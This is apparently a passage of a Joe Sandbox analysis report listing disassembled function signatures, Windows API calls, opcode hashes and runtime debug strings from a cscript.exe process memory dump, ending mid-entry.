                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 3112009249-0
                                                      • Opcode ID: 97aa68f37da1b919ad613c74cc47d4b8ca3441fde3b17b100ec50a4ab533ad4e
                                                      • Instruction ID: ddacb21764176ec37715235c9e8b68d68a6cb072be940bc0292d33bc9bc9428a
                                                      • Opcode Fuzzy Hash: 97aa68f37da1b919ad613c74cc47d4b8ca3441fde3b17b100ec50a4ab533ad4e
                                                      • Instruction Fuzzy Hash: CD31E831A04528BFEB209B94AC45BEE77BAEB54311F208055FA11EB291DF70DD48CB99
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00625F32
                                                      • MsgWaitForMultipleObjectsEx.USER32(00000000,00000000,00000000,00001DFF,00000004), ref: 00625FA0
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00625FB2
                                                      • GetTickCount.KERNEL32 ref: 00625FD2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CountTick$MessageMultipleObjectsPeekWait
                                                      • String ID:
                                                      • API String ID: 856712567-0
                                                      • Opcode ID: e0f37009f0d230778a75bf80fdeb1e46646bebb73944baa9b2b1e4527996e0f4
                                                      • Instruction ID: 4da4e73cdc84bb2926546b40a20ef9c9d2a2f0329f4b6900c4b09ef66a0dfad3
                                                      • Opcode Fuzzy Hash: e0f37009f0d230778a75bf80fdeb1e46646bebb73944baa9b2b1e4527996e0f4
                                                      • Instruction Fuzzy Hash: 4931C171E00A19F7DB155F90EA487EE7B79FF04741F208194E542B51D0E7358A51EF81
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00639498), ref: 0062C155
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 0062C192
                                                      • LoadRegTypeLib.OLEAUT32(?,?,00000000,?,?), ref: 00631651
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 00631662
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterLoadType
                                                      • String ID:
                                                      • API String ID: 2204791303-0
                                                      • Opcode ID: e13e2b77b8fbc6b0deebb22891d6e8f875590439b62f08e61aa23250227a4447
                                                      • Instruction ID: 20ce2acf0234317c3564010d57aa3daac0a59f961ecacda6092bef1e658f792c
                                                      • Opcode Fuzzy Hash: e13e2b77b8fbc6b0deebb22891d6e8f875590439b62f08e61aa23250227a4447
                                                      • Instruction Fuzzy Hash: 58216B75200609EFC7109F98EC89A6D77B7FB88310F254058E9069B391DB71AC12EFA1
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00639498), ref: 0062BEE5
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 0062BF22
                                                      • LoadRegTypeLib.OLEAUT32(?,?,00000000,?,?), ref: 006315C0
                                                      • LeaveCriticalSection.KERNEL32(00639498), ref: 006315D1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$EnterLoadType
                                                      • String ID:
                                                      • API String ID: 2204791303-0
                                                      • Opcode ID: 40e6f29fdc8edfae6ed7138e2f17befbb9c19417d31355454d24841d3128164c
                                                      • Instruction ID: 624ae1f41d2a69ed3449fc94c4d749bcb0b8a420f6c18c805893e3674e4e0e43
                                                      • Opcode Fuzzy Hash: 40e6f29fdc8edfae6ed7138e2f17befbb9c19417d31355454d24841d3128164c
                                                      • Instruction Fuzzy Hash: 34216875200709EFC7109F98EC84AAA77B6FB88310F251058E9069B351DB71AD42EFA1
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • GetCurrentThreadId.KERNEL32 ref: 00628256
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0062826A
                                                      • CreateThread.KERNEL32(00000000,00000000,0062C370,00000000,00000000,00000014), ref: 0062828B
                                                        • Part of subcall function 0062865B: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 0062867A
                                                      • CloseHandle.KERNEL32(?), ref: 006282AA
                                                      • GetLastError.KERNEL32 ref: 0063068C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CreateThread$CloseCurrentErrorEventHandleLastMultipleObjectsWaitmalloc
                                                      • String ID:
                                                      • API String ID: 2537244164-0
                                                      • Opcode ID: f941ea390c094b7c057317be6b8c624a37abf4173bf22e3b9fc665cfcdcf4e7f
                                                      • Instruction ID: 991cfefc87161def8ce768f2fea8e42c3bb54f7e97c11fda509e7f9db4a5f5b0
                                                      • Opcode Fuzzy Hash: f941ea390c094b7c057317be6b8c624a37abf4173bf22e3b9fc665cfcdcf4e7f
                                                      • Instruction Fuzzy Hash: FA21C2B1141B219FE3305F559C197177AF3AB81711F21491CE8868B391DBB9E4098FD5
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C002E7
                                                      • RTL: Re-Waiting, xrefs: 04C0031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C002BD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                      • Instruction ID: d8d39e8031efdd2bb1c00b88a28773095198f527b495c84abafe1dac27357efb
                                                      • Opcode Fuzzy Hash: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
                                                      • Instruction Fuzzy Hash: 05E1AE306047419FD725CF29C884B7AB7E1FB49314F144AADE8A5CB2E1E7B4E945CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: wcscpy_s
                                                      • String ID: WSH
                                                      • API String ID: 4009619764-2133009938
                                                      • Opcode ID: 27d35b79e1377a9c793ec0e80622b29b11a3bf6bf8aa26326b452a86ba83ac99
                                                      • Instruction ID: a7f4993f7d12ed2f6b0739ef7ca82e2f0c98286952d175f347ceb352bc26977d
                                                      • Opcode Fuzzy Hash: 27d35b79e1377a9c793ec0e80622b29b11a3bf6bf8aa26326b452a86ba83ac99
                                                      • Instruction Fuzzy Hash: D45138B06006299BDB24DB64EC85BFA73ABFF44314F184169E90697381DB31AD45CFE1
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C07B7F
                                                      • RTL: Resource at %p, xrefs: 04C07B8E
                                                      • RTL: Re-Waiting, xrefs: 04C07BAC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                      • Instruction ID: 5d2287009b334b80f932f74c77fdb8f21e102a7f4a530278e0342ebf5bbe88da
                                                      • Opcode Fuzzy Hash: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
                                                      • Instruction Fuzzy Hash: 294126317057029FDB24DE25D881B6AB7E6EF88714F000A5DF95ADB780DB30F5059B91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C0728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C07294
                                                      • RTL: Resource at %p, xrefs: 04C072A3
                                                      • RTL: Re-Waiting, xrefs: 04C072C1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                      • Instruction ID: 11c88b374c05c67a5079e53d5518056ed340b5bb87273e4fd187ea586cf269c0
                                                      • Opcode Fuzzy Hash: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
                                                      • Instruction Fuzzy Hash: DB410F31709216ABDB24DE25CC82B6AB7A6FB84714F10465CF955EB280EB30F9529BD0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 2de70beebd084ce779366433401d5e8d104baa0a163fa9930c2f5a91043837c0
                                                      • Instruction ID: ba2e042a28e7f53a0522f12c1a777764daa441af52eee868f8d73e5e4ec48302
                                                      • Opcode Fuzzy Hash: 2de70beebd084ce779366433401d5e8d104baa0a163fa9930c2f5a91043837c0
                                                      • Instruction Fuzzy Hash: E6314372A006199FDB20DF29CD41BAEB7FDEB44754F4445D9E849E3240EB30BA449BA1
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(?,Shell,00000000,00020006,?,00000000,?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B53
                                                      • RegSetValueExA.ADVAPI32(?,00623EFE,00000000,00000001,006329F1,00000001,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B89
                                                      • RegCloseKey.ADVAPI32(?,?,00632A72,?,Open2,?,006329F1,00000000), ref: 00632B94
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenValue
                                                      • String ID: Shell
                                                      • API String ID: 779948276-2220072441
                                                      • Opcode ID: 1db48161889e5707fc372cede4a9c67a49872c81fd488cbbcd6df430192f23e1
                                                      • Instruction ID: a4e8f32331c1ecaf7ef588fa49e7b59d316b0b171cf1c283d72642024997d130
                                                      • Opcode Fuzzy Hash: 1db48161889e5707fc372cede4a9c67a49872c81fd488cbbcd6df430192f23e1
                                                      • Instruction Fuzzy Hash: 9B012637A00121BBDB254E949C15FBAB73BAB84B48F118158BD82AB280C672DE0596D0
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,00632BFE,Open2,00000000,WSFFile,?,00632BFE,?,?,?,?,Open2,00000000), ref: 00632ACF
                                                      • RegCreateKeyA.ADVAPI32(80000001,?,00632BFE), ref: 00632ADE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CreateOpen
                                                      • String ID: Open2$WSFFile
                                                      • API String ID: 436179556-2493992722
                                                      • Opcode ID: 4528a29c5427f02491efefa509fcb5d438da3186addb12916e030bccdf26b2f0
                                                      • Instruction ID: e4e85c1b1a4818f496338af9fef9cfb772e11acd9fe7e1d1c12feb62622b4fdc
                                                      • Opcode Fuzzy Hash: 4528a29c5427f02491efefa509fcb5d438da3186addb12916e030bccdf26b2f0
                                                      • Instruction Fuzzy Hash: 55E06D722002667797300AAA5C48EA7AEAEEB85BF1F154026B945D6251C9B9CC00E2F0
                                                      APIs
                                                      • CreateErrorInfo.OLEAUT32(?,?,00000000,?,?,?), ref: 006322C7
                                                      • SetErrorInfo.OLEAUT32(00000000,?,?,00000000,?), ref: 0063241A
                                                      • SysFreeString.OLEAUT32(?), ref: 0063246D
                                                      • SysFreeString.OLEAUT32(?), ref: 00632476
                                                        • Part of subcall function 0062BCDF: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0062B95E,?), ref: 0062BD1E
                                                        • Part of subcall function 0062BCDF: SysAllocString.OLEAUT32(?), ref: 0062BD2F
                                                        • Part of subcall function 0062BCDF: LocalFree.KERNEL32(00000000,?,00000000,0062B95E,?), ref: 0062BD51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString$ErrorInfo$AllocCreateFormatLocalMessage
                                                      • String ID:
                                                      • API String ID: 2475300705-0
                                                      • Opcode ID: 4d7c1ee301a2cd7e0096e7f2df0146772b6705bd8b1e5a9922f18ff82c4c3d70
                                                      • Instruction ID: 0bad160f97b2adc8a99b5ae08efe2e8d74e20d286e474e52637d213e598d7ced
                                                      • Opcode Fuzzy Hash: 4d7c1ee301a2cd7e0096e7f2df0146772b6705bd8b1e5a9922f18ff82c4c3d70
                                                      • Instruction Fuzzy Hash: 34518E75B006169FCB01DF95E8A4A5E7BF7EF48314F250069E60297351DF35AE029BC1
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 0062A1C1
                                                      • SysAllocString.OLEAUT32(?), ref: 0062A1FE
                                                      • SafeArrayPutElement.OLEAUT32(2C6A5756,?,?), ref: 0062A21D
                                                      • VariantClear.OLEAUT32(?), ref: 0062A22A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
                                                      • String ID:
                                                      • API String ID: 90143694-0
                                                      • Opcode ID: e27e9e3d01e0e689ce613430a1d1424813d853829687b216d74397fd4655923e
                                                      • Instruction ID: 8dfd67139f07c5890180c91b51bdfd0abad886213550f11edf1cc08c7af2c2d6
                                                      • Opcode Fuzzy Hash: e27e9e3d01e0e689ce613430a1d1424813d853829687b216d74397fd4655923e
                                                      • Instruction Fuzzy Hash: 7041AF71A0061ADBDB00CFD5D894AAEB7B6FB48310F148069E811E7340DB76DE45CF96
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00629E5A
                                                      • SysAllocString.OLEAUT32(?), ref: 00629E87
                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 00629EA3
                                                      • VariantClear.OLEAUT32(?), ref: 00629EAF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariantmalloc
                                                      • String ID:
                                                      • API String ID: 90143694-0
                                                      • Opcode ID: ac1ea37a5df391e540e99eecd37d27ebcb4b9d4c1a5bcf66258a6d9f2ad44e59
                                                      • Instruction ID: 0f8ddfc5affbb2059da2615fefac0471e33755ce67d90106163807015cb8ea9d
                                                      • Opcode Fuzzy Hash: ac1ea37a5df391e540e99eecd37d27ebcb4b9d4c1a5bcf66258a6d9f2ad44e59
                                                      • Instruction Fuzzy Hash: 7F318271B0071A9BDB00DFA5D894AAEBBFAEF88710F104129E901D7351DB71DD058BD5
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0062D3F5
                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 0062D438
                                                      • VariantClear.OLEAUT32(?), ref: 0062D471
                                                        • Part of subcall function 0062D500: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0062D51D
                                                      • VariantClear.OLEAUT32(?), ref: 0062D487
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Variant$ArrayClearSafe$BoundElementInit
                                                      • String ID:
                                                      • API String ID: 1178528639-0
                                                      • Opcode ID: 03969bd80011f21f6dd4c824c0b19d61f6aa6be2dbe115bda0546fb10c6f4c13
                                                      • Instruction ID: 839eb34ed4f6d06c8c11eb4b60636ebf06bbe02df71b34437693603eddff3883
                                                      • Opcode Fuzzy Hash: 03969bd80011f21f6dd4c824c0b19d61f6aa6be2dbe115bda0546fb10c6f4c13
                                                      • Instruction Fuzzy Hash: 9F211B712047169BC704EF64E89496B7BEAAB88754F10093DF996C3251DB30EE09CB96
                                                      APIs
                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 0062A43E
                                                      • SysFreeString.OLEAUT32(?), ref: 0062A47F
                                                      • SysFreeString.OLEAUT32(?), ref: 0062A488
                                                      • SysFreeString.OLEAUT32(?), ref: 0062A491
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString$ArrayDestroySafe
                                                      • String ID:
                                                      • API String ID: 4164600000-0
                                                      • Opcode ID: 518ca94931758e1cb01cf4b263f657d584135246f3530544af2fa3db7e80b379
                                                      • Instruction ID: 32384777000c19b5926f0869175e7ce8e62bd81ed4b21d454ffdb62e5f9ce36c
                                                      • Opcode Fuzzy Hash: 518ca94931758e1cb01cf4b263f657d584135246f3530544af2fa3db7e80b379
                                                      • Instruction Fuzzy Hash: 20219C70600A28DFC720AFA4E94C92ABBF7FF44314B10991CE14687721CBB2EC409F86
                                                      APIs
                                                      • LoadStringW.USER32(?,?,00000800,00000C89), ref: 0062A737
                                                      • SysAllocString.OLEAUT32(?), ref: 0062A74A
                                                      • LoadStringA.USER32(?,?,00000800,00000C89), ref: 00630C03
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,?,00000800,00000C89,00000000,00000000,?,0062F960), ref: 00630C24
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$Load$AllocByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 1944948655-0
                                                      • Opcode ID: 1aae10f1e0665cf296268f1df6f543c1c2de8a3924d9a2ce1c661af25518d21a
                                                      • Instruction ID: 29bd3b62c671c58f54ea46084efeb6403145c183d27c0d772b3d2795d6488f28
                                                      • Opcode Fuzzy Hash: 1aae10f1e0665cf296268f1df6f543c1c2de8a3924d9a2ce1c661af25518d21a
                                                      • Instruction Fuzzy Hash: FA11CA75600229AFE7118BA4EC04AEAB7FEEB48740F0840A5B941D2290DB708E09CFE4
                                                      APIs
                                                      • GetFileSize.KERNEL32(0062B2EA,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0062B595
                                                      • CreateFileMappingA.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0062B5B6
                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000), ref: 0062B5D0
                                                      • GetLastError.KERNEL32(?,0062B55F,00000000,?,?,0062B2EA,?,?,?,?,00000000,00000000), ref: 0063142A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLastMappingSizeView
                                                      • String ID:
                                                      • API String ID: 2735091159-0
                                                      • Opcode ID: 03cd76c34e6d516aa8a0db2b1c8d69c6bf91f67bbdf6b6d1acb5757940cd9ed2
                                                      • Instruction ID: 07e7fa3be5064c688c777ee1b2b23cfa23868b70c1f85bf7dbf536ebbc5a4856
                                                      • Opcode Fuzzy Hash: 03cd76c34e6d516aa8a0db2b1c8d69c6bf91f67bbdf6b6d1acb5757940cd9ed2
                                                      • Instruction Fuzzy Hash: 5701F970240712AFE7301F755C09F6677DAEF00720F309529BA95EE2E0E770E4419B94
                                                      APIs
                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00001CFF), ref: 0062867A
                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 006307D4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: MessageMultipleObjectsPeekWait
                                                      • String ID:
                                                      • API String ID: 3986374578-0
                                                      • Opcode ID: 458e40291c44fbf3ba2ce5fd48283c0fa86d0bb3cbe4d5ecdf2b581f35496837
                                                      • Instruction ID: e96c177d418d56cc35df4e3f3ff19f0a41964899eaa33de7ed455d6c123227e8
                                                      • Opcode Fuzzy Hash: 458e40291c44fbf3ba2ce5fd48283c0fa86d0bb3cbe4d5ecdf2b581f35496837
                                                      • Instruction Fuzzy Hash: 86F096724011257B9B109BE69C4CCEF7B7EEEC67207140215F511E2194D635D605DBF1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 73c811ced668665b9063b238c16017b956f6b88c948527438643f63d9cef9580
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 59919270E002569BDF38DE69C881AFEB7A5EF44720F5449DAE865E72C0FF30A9418760
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                      • Instruction ID: b50b94d581e636404f4a98d3b0e3de3166a23488acedf31cc35f2237ee902338
                                                      • Opcode Fuzzy Hash: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
                                                      • Instruction Fuzzy Hash: 17810DB5D00269ABDB35DF54CC44BEEB7B4AB48714F0041EAAA1DB7240E7716E94CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 04C1CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 989b96ccad6d8bf8810719ec3dafd93e9cc1306406cc331f13e7d471ceea1121
                                                      • Instruction ID: 155ce8a08eb38f3f32a4c8aae91e55f64e47e90610417a5fe929101aac38d1d6
                                                      • Opcode Fuzzy Hash: 989b96ccad6d8bf8810719ec3dafd93e9cc1306406cc331f13e7d471ceea1121
                                                      • Instruction Fuzzy Hash: 4941CE71A00254DFDB219FA9D840AAEBBF9FF45B08F00416EE906DB260E734F901DB64
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
